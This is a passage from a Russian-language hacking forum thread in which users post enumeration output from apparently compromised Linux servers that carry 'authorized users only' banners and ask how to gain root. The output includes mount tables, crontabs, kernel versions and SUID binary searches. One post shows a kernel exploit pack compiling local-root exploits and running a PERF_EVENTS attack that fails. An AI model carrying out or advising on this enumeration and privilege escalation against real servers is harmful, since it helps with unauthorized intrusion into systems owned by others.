    -rwxr-xr-x  1 root root 1369312 2015-05-12 23:58:28.000000000 +0300 libcrypto.so.0.9.8e
    lrwxrwxrwx  1 root root      14 2009-09-29 10:33:39.000000000 +0400 libcrypto.so.4 -> libcrypto.so.6
    lrwxrwxrwx  1 root root      19 2015-05-14 01:08:43.000000000 +0300 libcrypto.so.6 -> libcrypto.so.0.9.8e
    -rwxr-xr-x  1 root root  831880 2007-01-07 06:09:55.000000000 +0300 libdb-4.1.so
    -rwxr-xr-x  1 root root  927720 2007-01-07 06:09:55.000000000 +0300 libdb-4.2.so
    -rwxr-xr-x  1 root root 1008656 2010-07-12 20:09:33.000000000 +0400 libdb-4.3.so
    -rwxr-xr-x  1 root root  901352 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.1.so
    -rwxr-xr-x  1 root root 1011880 2007-01-07 06:09:55.000000000 +0300 libdb_cxx-4.2.so
    lrwxrwxrwx  1 root root      18 2013-10-20 01:10:44.000000000 +0400 libdbus-1.so.3 -> libdbus-1.so.3.4.0
    -rwxr-xr-x  1 root root  243288 2013-10-02 01:59:24.000000000 +0400 libdbus-1.so.3.4.0
    lrwxrwxrwx  1 root root      31 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2.so -> libdevmapper-event-lvm2.so.2.02
    -r-xr-xr-x  1 root root    6712 2014-09-17 21:57:55.000000000 +0400 libdevmapper-event-lvm2.so.2.02
    lrwxrwxrwx  1 root root      46 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2mirror.so -> device-mapper/libdevmapper-event-lvm2mirror.so
    lrwxrwxrwx  1 root root      48 2014-10-01 01:10:52.000000000 +0400 libdevmapper-event-lvm2snapshot.so -> device-mapper/libdevmapper-event-lvm2snapshot.so
    -r--r--r--  1 root root   64678 2014-11-18 13:10:58.000000000 +0300 libdevmapper-event.a
    lrwxrwxrwx  1 root root      26 2014-11-19 01:08:46.000000000 +0300 libdevmapper-event.so -> libdevmapper-event.so.1.02
    -r-xr-xr-x  1 root root   21856 2014-11-18 13:11:03.000000000 +0300 libdevmapper-event.so.1.02
    -r--r--r--  1 root root  717500 2014-11-18 13:10:52.000000000 +0300 libdevmapper.a
    lrwxrwxrwx  1 root root      20 2014-11-19 01:08:46.000000000 +0300 libdevmapper.so -> libdevmapper.so.1.02
    -r-xr-xr-x  1 root root  154640 2014-11-18 13:11:03.000000000 +0300 libdevmapper.so.1.02
    -rwxr-xr-x  1 root root   23360 2015-01-27 20:33:49.000000000 +0300 libdl-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:22.000000000 +0300 libdl.so.2 -> libdl-2.5.so
    lrwxrwxrwx  1 root root      34 2011-09-15 01:15:02.000000000 +0400 libdmraid-events-isw.so -> libdmraid-events-isw.so.1.0.0.rc13
    -rwxr-xr-x  1 root root   22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13
    -r-xr-xr-x  1 root root   22256 2011-07-22 09:07:30.000000000 +0400 libdmraid-events-isw.so.1.0.0.rc13-17
    lrwxrwxrwx  1 root root      23 2011-09-15 01:15:02.000000000 +0400 libdmraid.so -> libdmraid.so.1.0.0.rc13
    -rwxr-xr-x  1 root root  212736 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13
    -r-xr-xr-x  1 root root  215256 2011-07-22 09:07:30.000000000 +0400 libdmraid.so.1.0.0.rc13-17
    lrwxrwxrwx  1 root root      13 2014-10-01 01:10:44.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
    -rwxr-xr-x  1 root root   26424 2014-09-18 14:12:06.000000000 +0400 libe2p.so.2.3
    lrwxrwxrwx  1 root root      17 2012-06-14 01:12:05.000000000 +0400 libexpat.so.0 -> libexpat.so.0.5.0
    -rwxr-xr-x  1 root root  144344 2012-06-13 18:35:35.000000000 +0400 libexpat.so.0.5.0
    lrwxrwxrwx  1 root root      16 2014-10-01 01:10:44.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
    -rwxr-xr-x  1 root root  122296 2014-09-18 14:12:06.000000000 +0400 libext2fs.so.2.4
    -rwxr-xr-x  1 root root   58400 2014-09-18 05:58:04.000000000 +0400 libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      28 2014-10-01 01:10:09.000000000 +0400 libgcc_s.so.1 -> libgcc_s-4.1.2-20080825.so.1
    lrwxrwxrwx  1 root root      23 2009-09-29 10:33:39.000000000 +0400 libglib-2.0.so.0 -> libglib-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  647608 2009-03-25 04:47:43.000000000 +0300 libglib-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:33:39.000000000 +0400 libgmodule-2.0.so.0 -> libgmodule-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   13520 2009-03-25 04:47:43.000000000 +0300 libgmodule-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:33:39.000000000 +0400 libgobject-2.0.so.0 -> libgobject-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root  262904 2009-03-25 04:47:43.000000000 +0300 libgobject-2.0.so.0.1200.3
    lrwxrwxrwx  1 root root      26 2009-09-29 10:33:39.000000000 +0400 libgthread-2.0.so.0 -> libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   19176 2009-03-25 04:47:43.000000000 +0300 libgthread-2.0.so.0.1200.3
    -rwxr-xr-x  1 root root   31576 2007-03-15 06:16:08.000000000 +0300 libiw.so.28
    -rwxr-xr-x  1 root root    9472 2007-01-06 10:55:38.000000000 +0300 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2009-09-29 10:33:39.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
    -r--r--r--  1 root root 5902120 2014-09-17 21:57:53.000000000 +0400 liblvm2cmd.a
    lrwxrwxrwx  1 root root      18 2014-10-01 01:10:52.000000000 +0400 liblvm2cmd.so -> liblvm2cmd.so.2.02
    -r-xr-xr-x  1 root root  804632 2014-09-17 21:57:55.000000000 +0400 liblvm2cmd.so.2.02
    -rwxr-xr-x  1 root root  614992 2015-01-27 20:33:49.000000000 +0300 libm-2.5.so
    lrwxrwxrwx  1 root root      11 2015-01-28 18:11:22.000000000 +0300 libm.so.6 -> libm-2.5.so
    -rwxr-xr-x  1 root root  114352 2015-01-27 20:33:49.000000000 +0300 libnsl-2.5.so
    lrwxrwxrwx  1 root root      13 2015-01-28 18:11:22.000000000 +0300 libnsl.so.1 -> libnsl-2.5.so
    -rwxr-xr-x  1 root root   43128 2015-01-27 20:33:49.000000000 +0300 libnss_compat-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:22.000000000 +0300 libnss_compat.so.2 -> libnss_compat-2.5.so
    -rwxr-xr-x  1 root root  799680 2015-01-05 13:12:31.000000000 +0300 libnss_db-2.2.so
    lrwxrwxrwx  1 root root      16 2015-01-06 01:08:40.000000000 +0300 libnss_db.so.2 -> libnss_db-2.2.so
    -rwxr-xr-x  1 root root   23736 2015-01-27 20:33:49.000000000 +0300 libnss_dns-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:22.000000000 +0300 libnss_dns.so.2 -> libnss_dns-2.5.so
    -rwxr-xr-x  1 root root   53880 2015-01-27 20:33:49.000000000 +0300 libnss_files-2.5.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:22.000000000 +0300 libnss_files.so.2 -> libnss_files-2.5.so
    -rwxr-xr-x  1 root root   24736 2015-01-27 20:33:49.000000000 +0300 libnss_hesiod-2.5.so
    lrwxrwxrwx  1 root root      20 2015-01-28 18:11:22.000000000 +0300 libnss_hesiod.so.2 -> libnss_hesiod-2.5.so
    -rwxr-xr-x  1 root root 3185264 2015-06-15 15:38:14.000000000 +0300 libnss_ldap-2.5.so
    lrwxrwxrwx  1 root root      18 2015-06-16 01:09:08.000000000 +0300 libnss_ldap.so.2 -> libnss_ldap-2.5.so
    -rwxr-xr-x  1 root root   53544 2015-01-27 20:33:49.000000000 +0300 libnss_nis-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:22.000000000 +0300 libnss_nis.so.2 -> libnss_nis-2.5.so
    -rwxr-xr-x  1 root root   62944 2015-01-27 20:33:49.000000000 +0300 libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      21 2015-01-28 18:11:22.000000000 +0300 libnss_nisplus.so.2 -> libnss_nisplus-2.5.so
    lrwxrwxrwx  1 root root      16 2015-05-28 01:08:58.000000000 +0300 libpam.so.0 -> libpam.so.0.81.5
    -rwxr-xr-x  1 root root   46800 2015-05-27 16:48:51.000000000 +0300 libpam.so.0.81.5
    lrwxrwxrwx  1 root root      21 2015-05-28 01:08:58.000000000 +0300 libpam_misc.so.0 -> libpam_misc.so.0.81.2
    -rwxr-xr-x  1 root root   13456 2015-05-27 16:48:51.000000000 +0300 libpam_misc.so.0.81.2
    lrwxrwxrwx  1 root root      17 2015-05-28 01:08:58.000000000 +0300 libpamc.so.0 -> libpamc.so.0.81.0
    -rwxr-xr-x  1 root root   11264 2015-05-27 16:48:51.000000000 +0300 libpamc.so.0.81.0
    lrwxrwxrwx  1 root root      16 2013-10-20 01:10:04.000000000 +0400 libpcre.so.0 -> libpcre.so.0.0.1
    -rwxr-xr-x  1 root root  129984 2013-10-01 22:15:48.000000000 +0400 libpcre.so.0.0.1
    -rwxr-xr-x  1 root root   61248 2013-10-02 00:37:04.000000000 +0400 libproc-3.2.7.so
    -rwxr-xr-x  1 root root  149968 2015-01-27 20:33:50.000000000 +0300 libpthread-2.5.so
    lrwxrwxrwx  1 root root      17 2015-01-28 18:11:22.000000000 +0300 libpthread.so.0 -> libpthread-2.5.so
    -rwxr-xr-x  1 root root   92816 2015-01-27 20:33:50.000000000 +0300 libresolv-2.5.so
    lrwxrwxrwx  1 root root      16 2015-01-28 18:11:22.000000000 +0300 libresolv.so.2 -> libresolv-2.5.so
    -rwxr-xr-x  1 root root   53448 2015-01-27 20:33:50.000000000 +0300 librt-2.5.so
    lrwxrwxrwx  1 root root      12 2015-01-28 18:11:22.000000000 +0300 librt.so.1 -> librt-2.5.so
    -rwxr-xr-x  1 root root   95464 2011-03-06 07:48:31.000000000 +0300 libselinux.so.1
    -rwxr-xr-x  1 root root  159592 2009-09-04 02:47:06.000000000 +0400 libsemanage.so.1
    -rwxr-xr-x  1 root root  247496 2010-03-31 12:17:32.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root      12 2014-10-01 01:10:44.000000000 +0400 libss.so.2 -> libss.so.2.0
    -rwxr-xr-x  1 root root   26688 2014-09-18 14:12:06.000000000 +0400 libss.so.2.0
    -rwxr-xr-x  1 root root  323528 2015-05-12 23:58:28.000000000 +0300 libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      11 2009-09-29 10:33:39.000000000 +0400 libssl.so.4 -> libssl.so.6
    lrwxrwxrwx  1 root root      16 2015-05-14 01:08:43.000000000 +0300 libssl.so.6 -> libssl.so.0.9.8e
    lrwxrwxrwx  1 root root      19 2009-09-29 10:33:39.000000000 +0400 libtermcap.so.2 -> libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   15584 2007-01-06 19:58:47.000000000 +0300 libtermcap.so.2.0.8
    -rwxr-xr-x  1 root root   36200 2015-01-27 20:33:50.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2015-01-28 18:11:22.000000000 +0300 libthread_db.so.1 -> libthread_db-1.0.so
    -rwxr-xr-x  1 root root   18152 2015-01-27 20:33:50.000000000 +0300 libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2015-01-28 18:11:22.000000000 +0300 libutil.so.1 -> libutil-2.5.so
    lrwxrwxrwx  1 root root      14 2014-10-01 01:10:44.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
    -rwxr-xr-x  1 root root   17936 2014-09-18 14:12:06.000000000 +0400 libuuid.so.1.2
    lrwxrwxrwx  1 root root      22 2014-10-01 01:11:15.000000000 +0400 libvolume_id.so.0 -> libvolume_id.so.0.66.0
    -rwxr-xr-x  1 root root   33792 2014-09-17 22:43:42.000000000 +0400 libvolume_id.so.0.66.0
    lrwxrwxrwx  1 root root      16 2009-10-23 01:10:41.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
    -rwxr-xr-x  1 root root   37368 2009-09-22 02:29:33.000000000 +0400 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      13 2013-01-18 01:13:05.000000000 +0400 libz.so -> libz.so.1.2.3
    lrwxrwxrwx  1 root root      13 2013-01-18 01:11:17.000000000 +0400 libz.so.1 -> libz.so.1.2.3
    -rwxr-xr-x  1 root root   85544 2012-07-17 12:32:04.000000000 +0400 libz.so.1.2.3
    drwxr-xr-x  2 root root    4096 2015-01-28 18:11:22.000000000 +0300 rtkaio
    drwxr-xr-x  4 root root    4096 2015-06-16 01:09:08.000000000 +0300 security
    mount
    Code:
    /dev/sda5 on / type ext3 (rw,usrquota)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    /dev/sda8 on /home type ext3 (rw,nosuid,noatime,usrquota,grpquota)
    /dev/sda3 on /usr type ext3 (rw,usrquota,grpquota)
    /dev/sda2 on /var type ext3 (rw,nosuid,usrquota,grpquota)
    /dev/sda1 on /boot type ext3 (rw)
    tmpfs on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
    none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1G,nr_inodes=256k)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /tmp on /tmp type none (rw,noexec,nosuid,bind)
    cat /etc/issue
    Code:
    This computer system is for authorized users only. Individuals using this
    system without authority or in excess of their authority are subject to
    having all their activities on this system monitored and recorded or
    examined by any authorized person, including law enforcement, as system
    personnel deem appropriate. In the course of monitoring individuals
    improperly using the system or in the course of system maintenance, the
    activities of authorized users may also be monitored and recorded. Any
    material so recorded may be disclosed as appropriate. Anyone using this
    system consents to these terms.
    cat /etc/crontab
    Code:
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    ls -la /etc/cron.hourly
    Code:
    -rwxr-xr-x   1 root root  1683 Nov 21  2014 check_raid_status
    -rwxr-xr-x   1 root root   390 May 18  2011 mcelog.cron
    ls -la /etc/cron.daily
    Code:
    -rwxr-xr-x   1 root       root    379 Mar 28  2007 0anacron
    lrwxrwxrwx   1 root       root     39 Jan 18  2013 0logwatch -> /usr/share/logwatch/scripts/logwatch.pl
    -rwxr-xr-x   1 root       root    118 Jan 20 20:14 cups
    -rwxr-xr-x   1 root       root    219 Jun  6  2013 logrotate
    -rwxr-xr-x   1 root       root    418 May 30  2012 makewhatis.cron
    -rwxr-xr-x   1 root       root    137 Sep  3  2009 mlocate.cron
    -rwxr-xr-x   1 root       root   2181 Jun 21  2006 prelink
    -rwxr-xr-x   1 root       root   1746 May 14  2012 rkhunter
    -rwxr-xr-x   1 adegtyarev wheel   322 Sep 17  2013 rpaf_ips
    -rwxr-xr-x   1 root       root    296 Dec  9  2014 rpm
    -rwxr-xr-x   1 root       root    354 Aug 11  2010 tmpwatch
    ls -la /etc/cron.monthly
    Code:
    -rwxr-xr-x   1 root root   381 Mar 28  2007 0anacron
    ls -la /etc/cron.weekly
    Code:
    -rwxr-xr-x   1 root root   380 Mar 28  2007 0anacron
    -rwxr-xr-x   1 root root  2843 Jan  9  2013 99-raid-check
    -rwxr-xr-x   1 root root   414 May 30  2012 makewhatis.cron
    cat /proc/version
    Code:
    Linux version 2.6.18-400.1.1.el5 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-55)) #1 SMP Thu Dec 18 00:59:53 EST 2014
    cat /proc/sys/vm/mmap_min_addr
    Code:
    4096
    pwd
    ls -la /usr/bin/staprun
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    Code:
    -rwsr-x--- 1 root dbus 48152 Oct  2  2013 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 61656 Nov  8  2012 /bin/mount
    -rwsr-x--- 1 root wheel 28336 Mar 21  2012 /bin/su
    -rwsr-xr-x 1 root root 41592 Nov  8  2012 /bin/umount
    -rwsr-xr-x 1 root root 2078708 Feb 22  2012 /opt/suphp/sbin/suphp
    -rwsr-xr-x 1 root root 19768 May 27 16:48 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 75504 May  6 12:41 /sbin/umount.nfs4
    -rwsr-xr-x 1 root root 75504 May  6 12:41 /sbin/umount.nfs
    -rwsr-xr-x 1 root root 75496 May  6 12:41 /sbin/mount.nfs
    -rwsr-x--- 1 root ecryptfs 19824 Feb 23  2012 /sbin/mount.ecryptfs_private
    -rwsr-xr-x 1 root root 75504 May  6 12:41 /sbin/mount.nfs4
    -rwsr-xr-x 1 root root 14112 May 27 16:48 /sbin/pam_timestamp_check
    -rwsr-xr-x 1 root root 176616 Feb 22  2012 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 1166176 Oct 25  2012 /usr/sbin/exim
    -rwsr-xr-x 1 root root 8848 Sep 22  2014 /usr/sbin/usernetctl
    -rwsr-xr-x 1 root root 200671 Sep 22  2014 /usr/kerberos/bin/ksu
    -rwsr-xr-x 1 root root 28584 Sep 17  2014 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 120784 Oct  2  2009 /usr/bin/incrontab
    -rwsr-xr-x 1 root root 51752 Sep 17  2014 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 50696 Sep 17  2014 /usr/bin/chage
    -rwsr-sr-x 1 root root 315640 Feb 23  2012 /usr/bin/crontab
    ---s--x--x 2 root root 190912 Mar 10  2014 /usr/bin/sudoedit
    -rwsr-xr-x 1 root root 75264 Jan  9  2013 /usr/bin/quota
    -rwsr-xr-x 1 root root 15552 Nov  7  2011 /usr/bin/rlogin
    -rwsr-xr-x 1 root root 27936 Aug 11  2010 /usr/bin/passwd
    ---s--x--x 2 root root 190912 Mar 10  2014 /usr/bin/sudo
    -rwsr-xr-x 1 root root 20384 Nov  7  2011 /usr/bin/rcp
    -rwsr-xr-x 1 root root 49392 Oct  8  2014 /usr/bin/at
    -rws--x--x 1 root root 22200 Nov  8  2012 /usr/bin/chfn
    -rwsr-xr-x 1 root root 11328 Nov  7  2011 /usr/bin/rsh
    -rwsr-xr-x 1 root root 18606 Feb 22  2012 /usr/local/apache/bin/suexec
    -rwsr-xr-x 1 root root 18606 Feb 22  2012 /usr/local/apache.backup/bin/suexec
     
  4. grimnir

    grimnir Members of Antichat

    semtex.c не берет
    Code:
    
    $ uname -a
    Linux host.com 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16 23:51:20 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot
    total 49531
    dr-xr-xr-x.  5 root root  1024 Jul 19  2013 .
    dr-xr-xr-x. 23 root root  4096 Jul  9 08:33 ..
    -rw-r--r--.  1 root root  171 Jul 17  2013 .vmlinuz-2.6.32-358.14.1.el6.x86_64.hmac
    -rw-r--r--.  1 root root  166 Feb 22  2013 .vmlinuz-2.6.32-358.el6.x86_64.hmac
    -rw-r--r--.  1 root root  2408392 Jul 17  2013 System.map-2.6.32-358.14.1.el6.x86_64
    -rw-r--r--.  1 root root  2407466 Feb 22  2013 System.map-2.6.32-358.el6.x86_64
    -rw-r--r--.  1 root root  104086 Jul 17  2013 config-2.6.32-358.14.1.el6.x86_64
    -rw-r--r--.  1 root root  104081 Feb 22  2013 config-2.6.32-358.el6.x86_64
    drwxr-xr-x.  3 root root  1024 Jul 19  2013 efi
    drwxr-xr-x.  2 root root  1024 Oct 15  2014 grub
    -rw-r--r--.  1 root root 16210951 Jul 19  2013 initramfs-2.6.32-358.14.1.el6.x86_64.img
    -rw-r--r--.  1 root root 16206526 Jul 19  2013 initramfs-2.6.32-358.el6.x86_64.img
    -rw-------  1 root root  4563905 Apr 16 02:54 initrd-2.6.32-358.14.1.el6.x86_64kdump.img
    drwx------.  2 root root  12288 Jul 19  2013 lost+found
    -rw-r--r--.  1 root root  185902 Jul 17  2013 symvers-2.6.32-358.14.1.el6.x86_64.gz
    -rw-r--r--.  1 root root  185734 Feb 22  2013 symvers-2.6.32-358.el6.x86_64.gz
    -rwxr-xr-x.  1 root root  4045680 Jul 17  2013 vmlinuz-2.6.32-358.14.1.el6.x86_64
    -rwxr-xr-x.  1 root root  4043888 Feb 22  2013 vmlinuz-2.6.32-358.el6.x86_64
    $ lls -la --full-time /lib
    
    $ lls -la --full-time /lib64
    
    $ mount
    /dev/sda2 on / type ext4 (rw,usrjquota=quota.user,jqfmt=vfsv0)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda1 on /boot type ext2 (rw)
    /dev/sda4 on /tmp type ext4 (rw,noexec,nosuid,nodev)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /tmp on /var/tmp type none (rw,noexec,nosuid,bind)
    $ df -h
    Filesystem  Size  Used Avail Use% Mounted on
    /dev/sda2  2.7T  631G  2.0T  25% /
    tmpfs  7.8G  0  7.8G  0% /dev/shm
    /dev/sda1  97M  51M  42M  55% /boot
    /dev/sda4  2.0G  84M  1.8G  5% /tmp
    $ cat /etc/issue
    This computer system is for authorized users only. Individuals using this
    system without authority or in excess of their authority are subject to
    having all their activities on this system monitored and recorded or
    examined by any authorized person, including law enforcement, as system
    personnel deem appropriate. In the course of monitoring individuals
    improperly using the system or in the course of system maintenance, the
    activities of authorized users may also be monitored and recorded. Any
    material so recorded may be disclosed as appropriate. Anyone using this
    system consents to these terms.
    
    $ cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/
    
    # For details see man 4 crontabs
    
    # Example of job definition:
    # .---------------- minute (0 - 59)
    # |  .------------- hour (0 - 23)
    # |  |  .---------- day of month (1 - 31)
    # |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
    # |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # |  |  |  |  |
    # *  *  *  *  * user-name command to be executed
    
    $ ls -la cron.d,
    
    $ ls -la cron.d
    
    $ ls -la cron.hourly
    
    $ ls -la cron.weekly
    
    $ cat /proc/version
    Linux version 2.6.32-358.14.1.el6.x86_64 ([email protected]) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jul 16 23:51:20 UTC 2013
    $ cat /proc/sys/vm/mmap_min_addr
    4096
    
    $ ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 Oct 15  2014 /usr/bin/staprun
    $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rws--x--x 1 root root 14280 May 27 17:00 /usr/libexec/pt_chown
    -rwsr-xr-x 1 abrt abrt 10296 Oct 16  2014 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
    -rwsr-xr-x 1 root root 257824 Nov 13  2014 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 14368 Oct 15  2014 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 19768 Dec 20  2014 /usr/local/apache/bin/suexec
    -rwsr-xr-x 1 root root 19768 Dec 20  2014 /usr/local/apache.backup/bin/suexec
    -rws--x--x 1 root root 20184 Oct 15  2014 /usr/bin/chfn
    -rwsr-xr-x 1 root root 66352 Apr  7 11:52 /usr/bin/chage
    -rwsr-xr-x 1 root root 82752 Mar 19  2014 /usr/bin/quota
    -rwsr-xr-x 1 root root 71480 Apr  7 11:52 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 54336 Oct 18  2014 /usr/bin/at
    -rwsr-xr-x 1 root root 22544 Oct 15  2014 /usr/bin/pkexec
    ---s--x--- 1 root stapusr 183072 Oct 15  2014 /usr/bin/staprun
    -rwsr-xr-x. 1 root root 30768 Feb 22  2012 /usr/bin/passwd
    -rwsr-xr-x 1 root root 36144 Apr  7 11:52 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 51784 Nov 23  2013 /usr/bin/crontab
    
    Compiling exp_abacus.c...OK.   
    Compiling exp_cheddarbay.c...OK.   
    Compiling exp_ingom0wnar.c...OK.   
    Compiling exp_moosecox.c...OK.   
    Compiling exp_paokara.c...OK.   
    Compiling exp_powerglove.c...OK.   
    Compiling exp_sieve.c...OK.   
    Compiling exp_therebel.c...OK.   
    Compiling exp_vmware.c...failed.   
    Compiling exp_wunderbar.c...OK.   
    Choose your exploit:   
     [0] Abacus: Linux 2.6.37 -> 3.8.8 PERF_EVENTS local root   
     [1] Ingo m0wnar: Linux 2.6.31 perf_counter local root (Ingo backdoor method)   
     [2] Sieve: Linux 2.6.18+ move_pages() infoleak   
     [3] Exit   
    > 0   
     ------------------------------------------------------------------------------   
     The limits of my language are the limits of my mind.  All I know is what I   
     have words for. --Wittgenstein   
     ------------------------------------------------------------------------------   
     [+] Resolved set_fs_root to 0xffffffff811b3030 (via System.map)   
     [+] Resolved set_fs_pwd to 0xffffffff811b2fc0 (via System.map)   
     [+] Resolved __virt_addr_valid to 0xffffffff8104bc90 (via System.map)   
     [+] Resolved init_task to 0xffffffff81a8d020 (via System.map)   
     [+] Resolved init_fs to 0xffffffff81ad4c40 (via System.map)   
     [+] Resolved default_exec_domain to 0xffffffff81a9a8a0 (via System.map)   
     [+] Resolved bad_file_ops to 0xffffffff81621300 (via System.map)   
     [+] Resolved bad_file_aio_read to 0xffffffff8119e9e0 (via System.map)   
     [+] Resolved ima_audit to 0xffffffff81fd4c7c (via System.map)   
     [+] Resolved ima_file_mmap to 0xffffffff8123fa00 (via System.map)   
     [+] Resolved ima_bprm_check to 0xffffffff8123f9c0 (via System.map)   
     [+] Resolved ima_file_check to 0xffffffff8123f990 (via System.map)   
     [+] Resolved selinux_enforcing to 0xffffffff81fd04c4 (via System.map)   
     [+] Resolved selinux_enabled to 0xffffffff81ae2880 (via System.map)   
     [+] Resolved security_ops to 0xffffffff81fcec58 (via System.map)   
     [+] Resolved default_security_ops to 0xffffffff81aded00 (via System.map)   
     [+] Resolved sel_read_enforce to 0xffffffff8122c120 (via System.map)   
     [+] Resolved audit_enabled to 0xffffffff81ed6ac4 (via System.map)   
     [+] Resolved commit_creds to 0xffffffff8109e5c0 (via System.map)   
     [+] Resolved prepare_kernel_cred to 0xffffffff8109e840 (via System.map)   
     [+] Resolved xen_start_info to 0xffffffff81ddf308 (via System.map)   
     [+] Resolved ptmx_fops to 0xffffffff81fdda60 (via System.map)   
     [+] Resolved mark_rodata_ro to 0xffffffff810459f0 (via System.map)   
     [+] Resolved set_kernel_text_ro to 0xffffffff81045b80 (via System.map)   
     [+] Resolved make_lowmem_page_readonly to 0xffffffff81005770 (via System.map)   
     [+] Resolved make_lowmem_page_readwrite to 0xffffffff81005720 (via System.map)   
     [!] Securely probing with great effort   
     [-] System rejected creation of perf event.  Either this system is patched, or a previous failed exploit was run against it. 
    
    
     
    #584 grimnir, 15 Jul 2015
    Last edited: 15 Jul 2015
  5. slalix

    slalix New Member

    Помогите разобраться с сей машинкой:

    Code:
    Linux srv007 2.6.32-5-amd64 #1 SMP Sun Sep 23 10:07:46 UTC 2012 x86_64 GNU/Linux
    Code:
    /dev/sda2 on / type ext3 (rw,noatime,errors=remount-ro)
    tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    udev on /dev type tmpfs (rw,mode=0755)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
    /dev/sda1 on /boot type ext3 (rw,noatime)
    /dev/sda6 on /home type ext3 (rw,nosuid,nodev,noatime,usrquota)
    /dev/sda5 on /var type ext3 (rw,noatime)
    Code:
    Debian GNU/Linux 6.0 \n \l
    Code:
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    Code:
    65536
    Code:
    total 16
    drwxr-xr-x   2 root root 4096 Dec 23  2014 .
    drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
    -rw-r--r--   1 root root  102 Dec 19  2010 .placeholder
    -rwx------   1 root root  317 Dec 23  2014 nginx-log-rotate
    Code:
    total 20
    drwxr-xr-x   2 root root 4096 Nov 14  2011 .
    drwxr-xr-x 104 root root 4096 Jul 17 12:12 ..
    -rw-r--r--   1 root root  102 Dec 19  2010 .placeholder
    -rwxr-xr-x   1 root root 1281 Sep 28  2010 acct
